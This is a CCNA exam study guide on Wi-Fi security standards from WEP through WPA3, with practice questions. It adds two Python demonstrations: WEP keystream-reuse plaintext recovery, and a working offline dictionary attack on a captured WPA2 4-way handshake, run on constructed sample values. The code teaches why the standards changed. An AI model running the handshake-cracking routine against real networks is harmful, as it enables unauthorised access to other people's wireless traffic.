Wireless security is a required topic on CCNA 200-301. You need to understand the progression from WEP (broken) through WPA, WPA2, and WPA3, the difference between Personal (PSK) and Enterprise (802.1X) modes, and the encryption algorithms each generation uses. This guide covers the key security features, their weaknesses, and what the exam expects you to know about each standard.
Wired Equivalent Privacy (WEP) was the original 802.11 wireless security standard, published in 1997. WEP encrypts each frame with the RC4 stream cipher, keyed per frame by concatenating a 24-bit Initialization Vector (IV), which is sent in the clear, with a static 40-bit or 104-bit shared key. The fatal flaws: the IV space is only 2^24 values, so IVs (and therefore RC4 keystreams) repeat on a busy network within hours, and the way the IV is simply prepended to the key lets an attacker who collects enough IV/ciphertext pairs recover the static key statistically (the FMS and later PTW attacks). A repeated keystream also means that knowing one frame's plaintext, such as a predictable ARP request, reveals the other frame's plaintext. Freely available tools (aircrack-ng) recover a WEP key in minutes from a passive capture.
WEP should never be used. It is included in CCNA only as historical context and to explain why the later standards were designed the way they were. If WEP appears as an answer option and the question asks for a 'secure' or 'recommended' choice, eliminate it immediately.
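The keystream-reuse flaw described above, as an added worked example that is not part of the original guide. It is a plain-Python RC4 and a WEP-style encryptor (hypothetical helper names; the key, IVs and frame contents are constructed, and the CRC-32 ICV is left out) showing that two frames sent under one IV leak each other's plaintext to a passive listener, plus the birthday bound that makes an IV repeat likely within a few thousand random IVs even though the space holds 16.7 million.

```python
"""Added example (not from the CCNA page): RC4 keystream reuse in WEP.

WEP forms each frame's RC4 key as IV (3 bytes, sent in the clear) || static
key. If two frames ever share an IV they share a keystream, and XOR-ing the
two ciphertexts cancels it out, leaving the XOR of the two plaintexts. The
key, IVs and frame contents below are constructed for illustration.
"""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling (KSA) followed by keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(static_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encrypt one frame body the WEP way: RC4 keyed with IV || static key.

    Real WEP appends a CRC-32 ICV to the plaintext first; it is omitted here
    because it does not change the keystream-reuse argument.
    """
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    if len(static_key) not in (5, 13):
        raise ValueError("WEP static key is 40 or 104 bits")
    return xor_bytes(plaintext, rc4_keystream(iv + static_key, len(plaintext)))


def recover_via_keystream_reuse(c1: bytes, known_p1: bytes, c2: bytes) -> bytes:
    """Passive attacker: c1 and c2 were sent under the same IV and p1 is known
    (e.g. a predictable ARP or DHCP frame). Then c1 ^ c2 = p1 ^ p2, so
    p2 = c1 ^ c2 ^ p1. The key is never involved."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames`
    frames when IVs are drawn at random from a 2**iv_bits space."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


if __name__ == "__main__":
    # Constructed sample: one 40-bit key, one IV used twice, two equal-length frames.
    key = bytes.fromhex("0a1b2c3d4e")
    iv = bytes.fromhex("00ff13")
    p1 = b"ARP who-has 10.0.0.1"   # plaintext the attacker can predict
    p2 = b"secret: 4711-9981-22"   # same length, plaintext the attacker wants
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)
    print(recover_via_keystream_reuse(c1, p1, c2))   # b'secret: 4711-9981-22'
    print(f"P(IV repeat after 5000 random IVs) = {iv_collision_probability(5000):.2f}")
```

The RC4 routine can be checked against the standard test vector (key "Key", plaintext "Plaintext" encrypts to BBF316E8D940AF0AD3). Drivers that choose IVs sequentially do not collide early but exhaust the space after 2^24 frames, and many early cards reset the IV to zero on every reboot, which is why real-world captures contained repeats far sooner than either model predicts.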
Wi-Fi Protected Access (WPA) was released in 2003 as an interim replacement for WEP while the full 802.11i amendment (which became WPA2) was being finalized. WPA uses TKIP (Temporal Key Integrity Protocol), which keeps RC4 but adds per-packet key mixing, a 48-bit sequence counter that doubles as a replay check, and the Michael message integrity code (MIC), closing the IV-reuse and frame-forgery holes that broke WEP.
WPA was designed to run on existing WEP hardware via a firmware update, which is why it kept RC4. While far stronger than WEP, TKIP has known weaknesses: Michael is a deliberately cheap MIC, and the 2008 Beck-Tews attack can decrypt and inject short frames on a TKIP network. WPA/TKIP is deprecated and should be replaced with WPA2 or WPA3. In practice that means disabling TKIP entirely rather than allowing it alongside AES, because on a mixed TKIP/AES WLAN the group (broadcast and multicast) key falls back to TKIP for every client.
WPA introduced the Personal (PSK) and Enterprise (802.1X) modes that carry through to WPA2 and WPA3.
WPA2, defined by the ratified 802.11i amendment, replaced WPA in 2004. WPA2 uses CCMP (Counter Mode with CBC-MAC Protocol), which derives both confidentiality and integrity from AES-128, a fundamentally stronger design than RC4 with a bolted-on MIC. WPA2 with CCMP is the minimum acceptable security standard for any current wireless deployment.
WPA2-Personal (WPA2-PSK) uses a Pre-Shared Key: a passphrase of 8 to 63 characters known to every user. The passphrase and SSID are run through PBKDF2-HMAC-SHA1 (4096 iterations) to produce a 256-bit PSK, which is used directly as the Pairwise Master Key (PMK). The 4-way handshake then derives a per-session Pairwise Transient Key (PTK) from the PMK, both MAC addresses and two nonces, so each client's traffic key is different; but anyone who knows the passphrase and captures a client's handshake can compute that client's PTK and decrypt its traffic. Simple to deploy; the weaknesses are that a compromised passphrase exposes every client and there is no per-user identity.
WPA2-Enterprise uses 802.1X/EAP for authentication. Each user or device has individual credentials, typically a username and password over PEAP or a certificate over EAP-TLS, verified by a RADIUS server. The EAP exchange produces a unique PMK for each session, so there is no shared secret to leak and compromising one user's keys does not affect others. Enterprise mode provides the identity-based access control needed for corporate networks.
WPA2 vulnerabilities: KRACK (Key Reinstallation Attack, 2017) showed that by replaying message 3 of the 4-way handshake an attacker could make a client reinstall its PTK and reset its packet counter, causing keystream reuse; it is mitigated by client and AP patches. Separately, the 4-way handshake exposes a MIC keyed from the PMK, so anyone who captures one handshake (or the PMKID that many access points include in the first EAPOL message) can test passphrase guesses offline at GPU speed. Use long, random passphrases, and treat WPA2-Personal as only as strong as the weakest passphrase in use.
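The PSK derivation from the WPA2-Personal paragraph and the offline dictionary attack mentioned just above, as one added example that is not from the original guide. It uses only Python's hashlib and hmac; the MAC addresses, nonces, EAPOL-Key bytes and wordlist are constructed stand-ins for what a real capture would contain, and the helper names are mine. The PBKDF2 step is checked against the IEEE 802.11 test vector (passphrase "password", SSID "IEEE").

```python
"""Added example (not from the CCNA page): WPA2-Personal key derivation and
why a captured 4-way handshake enables an offline dictionary attack.

PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) is the
PMK. The 4-way handshake derives the PTK from PMK, both MAC addresses and
both nonces; message 2 carries a MIC keyed with the first 16 bytes of the
PTK (the KCK). Nothing in the handshake is secret except the PMK, so each
passphrase guess can be checked against the captured MIC without ever
talking to the AP. MAC addresses, nonces, the EAPOL body and the wordlist
below are constructed for illustration.
"""
import hashlib
import hmac


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> 256-bit PSK (used directly as the PMK in WPA2-Personal)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range(3):                       # 3 * 20 bytes covers the 48 needed
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes):
    """PTK for CCMP (384 bits) split into KCK, KEK and TK (16 bytes each).
    Inputs are ordered by min/max so both sides compute the same key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf_384(pmk, b"Pairwise key expansion", data)
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 truncated to
    16 bytes, computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def offline_dictionary_attack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce,
                              eapol_zeroed, captured_mic):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None.
    Cost per guess is 4096 HMAC-SHA1 calls for PBKDF2 plus a handful more;
    a GPU performs hundreds of thousands of these per second."""
    for candidate in wordlist:
        kck, _, _ = derive_ptk(wpa2_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# Constructed "capture": the public values an eavesdropper sees in messages 1 and 2.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))            # stands in for the AP's random nonce
SNONCE = bytes(range(32, 64))        # stands in for the client's random nonce
# Placeholder for the EAPOL-Key frame bytes of message 2 with the MIC field zeroed.
EAPOL_ZEROED = b"\x02\x03" + b"\x00\x00" + SNONCE + bytes(16)


def simulate_capture(true_passphrase: str) -> bytes:
    """Produce the MIC a legitimate client would place in message 2 (the 'capture')."""
    kck, _, _ = derive_ptk(wpa2_psk(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_ZEROED)


if __name__ == "__main__":
    mic = simulate_capture("sunshine2019")
    wordlist = ["password", "letmein", "CorpGuest1", "sunshine2019", "correct horse battery staple"]
    print(offline_dictionary_attack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                    EAPOL_ZEROED, mic))   # sunshine2019
```

The 4096 PBKDF2 iterations only slow each guess; they do not stop the attack, because every input except the passphrase is visible on the air. That is the gap SAE closes in WPA3-Personal: no value in a WPA3 capture can be checked against a passphrase guess without a live exchange with the AP, so guesses become online, rate-limited and observable.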
WPA3 was released in 2018 to address WPA2 weaknesses. WPA3-Personal replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange based on the Dragonfly handshake. The passphrase is still shared, but it is no longer used directly as key material: each association runs an interactive exchange that yields a fresh PMK. This gives forward secrecy (an attacker who records traffic and later obtains the passphrase still cannot decrypt the recorded sessions) and resistance to offline dictionary attacks, because each passphrase guess requires a live exchange with the AP and cannot be verified from a capture alone. WPA3 also makes Protected Management Frames (802.11w) mandatory.
WPA3-Enterprise keeps 802.1X/EAP with CCMP (AES-128) as its baseline and adds an optional 192-bit mode, aligned with the CNSA suite, for high-security environments. In that mode the minimum cipher suite is GCMP-256 (AES-256 in GCM mode), HMAC-SHA384 for key derivation, and EAP-TLS using ECDH and ECDSA on a 384-bit curve or RSA keys of at least 3072 bits.
WPA3 Enhanced Open (OWE, Opportunistic Wireless Encryption, RFC 8110) encrypts traffic on open networks without a password: client and AP perform an unauthenticated Diffie-Hellman exchange during association and derive a per-client PMK from it. This protects users on public Wi-Fi from passive eavesdropping; previously an open network transmitted every frame in plaintext. Because neither side is authenticated, OWE does not protect against an active attacker who stands up a rogue AP with the same SSID.
WPA3 transition mode allows WPA3 and WPA2 devices to coexist on the same SSID during migration: the AP advertises both SAE and PSK, and each client uses the strongest it supports. The WPA2-PSK side is still derived from the same passphrase, so offline attacks on captured WPA2 handshakes remain possible until transition mode is switched off. For CCNA: know the key improvements, namely SAE replacing PSK, forward secrecy, mandatory PMF and stronger optional ciphers.
Open authentication (no security): no credentials required. Any device can join. Appropriate only for captive portal environments where a different mechanism handles access control. Never acceptable for corporate networks.
WPA2/3-Personal (PSK/SAE): passphrase authentication. All devices use the same credential. Easy to manage for small environments; doesn't scale because you can't revoke access for one user without changing the passphrase for everyone.
WPA2/3-Enterprise (802.1X/EAP): individual user credentials. Integrates with corporate identity systems (Active Directory via RADIUS). Users can be individually authenticated, authorized, and revoked. Required for compliance-driven environments (PCI-DSS, HIPAA).
| Standard | Encryption | Auth method | Key exchange | Status |
|---|---|---|---|---|
| WEP | RC4 (40/104-bit static key + 24-bit IV) | Open System / Shared Key | Static key, no handshake | Broken, never use |
| WPA | TKIP (RC4 with per-packet key mixing) | PSK or 802.1X | 4-way handshake (TKIP keys) | Deprecated |
| WPA2-Personal | CCMP (AES-128) | PSK (PBKDF2 of passphrase) | 4-way handshake from PSK | Current standard |
| WPA2-Enterprise | CCMP (AES-128) | 802.1X/EAP + RADIUS | EAP-derived per-session PMK, then 4-way handshake | Current standard (enterprise) |
| WPA3-Personal | CCMP (AES-128) | SAE (Dragonfly) | SAE yields a fresh PMK per association (forward secrecy), then 4-way handshake | Recommended |
| WPA3-Enterprise | CCMP (AES-128); GCMP-256 in 192-bit mode | 802.1X/EAP + RADIUS | EAP-derived PMK, then 4-way handshake; optional 192-bit suite | Highest security |
WPA2 and WPA3 use the same encryption algorithm
Partly true, which is why it is a trap. WPA2-Personal, WPA2-Enterprise and WPA3-Personal all encrypt with CCMP (AES-128); what WPA3-Personal changes is key establishment, replacing the PSK-based handshake with SAE. Only WPA3-Enterprise's optional 192-bit mode moves to GCMP-256 (AES-256).
Using a complex password with WPA2-Personal is as secure as WPA2-Enterprise
WPA2-Enterprise provides per-user authentication, per-session dynamic keys, and the ability to revoke individual access. WPA2-Personal shares one passphrase among all users — a compromised passphrase affects everyone, and there's no per-user identity or revocation without changing the password.
WEP is acceptable for legacy devices that don't support WPA2
WEP is cryptographically broken and can be cracked in minutes. If a device only supports WEP, it should be replaced or isolated on a separate network with no access to sensitive resources.
These questions are representative of what you will see on CCNA exams. The correct answer and explanation are shown immediately below each question.
Which wireless security protocol uses CCMP based on AES for encryption?
Explanation: WPA2 (802.11i) uses CCMP (Counter Mode with CBC-MAC Protocol) based on AES-128 as its encryption algorithm. WEP and WPA both use RC4: WEP directly, WPA through TKIP.
A hospital needs wireless security where each doctor authenticates with their individual Active Directory credentials. Which solution is appropriate?
Explanation: WPA2-Enterprise uses 802.1X/EAP with a RADIUS server that can integrate with Active Directory. Each user authenticates with individual credentials, enabling per-user access control, accounting, and revocation.
Which WPA3 feature protects previously recorded wireless traffic even if the passphrase is compromised later?
Explanation: WPA3-Personal uses SAE (Simultaneous Authentication of Equals), which provides forward secrecy. Each session uses unique keys derived through the SAE handshake — obtaining the passphrase later cannot decrypt previously captured sessions.
Which statement correctly describes a weakness of WPA2-Personal compared to WPA2-Enterprise?
Explanation: WPA2-Personal uses AES encryption (same strength as Enterprise) but authenticates all users with the same pre-shared passphrase. There is no per-user identity; revoking one user requires changing the passphrase for everyone. Enterprise mode provides individual authentication and revocation.
WPA3 Enhanced Open (OWE) provides which security feature on open wireless networks?
Explanation: WPA3 Enhanced Open (Opportunistic Wireless Encryption) encrypts open network traffic without requiring a passphrase. This protects against passive eavesdropping on public Wi-Fi networks that previously transmitted all data in plaintext.
WPA2-Personal uses a pre-shared key (passphrase) — all users share the same credential. WPA2-Enterprise uses 802.1X/EAP with a RADIUS server — each user authenticates with individual credentials. Enterprise provides per-user identity, accounting, and the ability to revoke individual access without affecting other users.
WEP uses RC4 with a 24-bit Initialization Vector (IV) prepended to a static key. IVs repeat quickly, so keystreams are reused, and the weak key construction lets an attacker recover the static key statistically from a passive capture (the FMS and PTW attacks); tools crack WEP in minutes without knowing the password. Its integrity check is a linear CRC-32 rather than a keyed MIC, so frames can also be modified and injected without the key.
WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals), providing forward secrecy and resistance to offline dictionary attacks. WPA3-Enterprise mandates stronger 192-bit cryptography. WPA3 Enhanced Open encrypts previously plaintext open networks. SAE forward secrecy is the most significant improvement.
WPA uses TKIP (Temporal Key Integrity Protocol), which wraps RC4 with per-packet key mixing and the Michael MIC so that it could run on WEP hardware via a firmware update. WPA2 uses CCMP (Counter Mode with CBC-MAC Protocol) based on AES-128, a fundamentally stronger cipher and integrity design. TKIP is deprecated; WPA2/CCMP is the minimum acceptable standard.
Yes, through WPA3 Transition Mode. The AP advertises both WPA2 and WPA3 on the same SSID. WPA3-capable devices use WPA3 (SAE); WPA2-only devices use WPA2 (PSK). This allows gradual migration without requiring immediate replacement of all client devices. The trade-off is that the WPA2 side keeps the same passphrase, so the offline dictionary exposure of WPA2-PSK persists until the last WPA2-only client is gone and transition mode is disabled.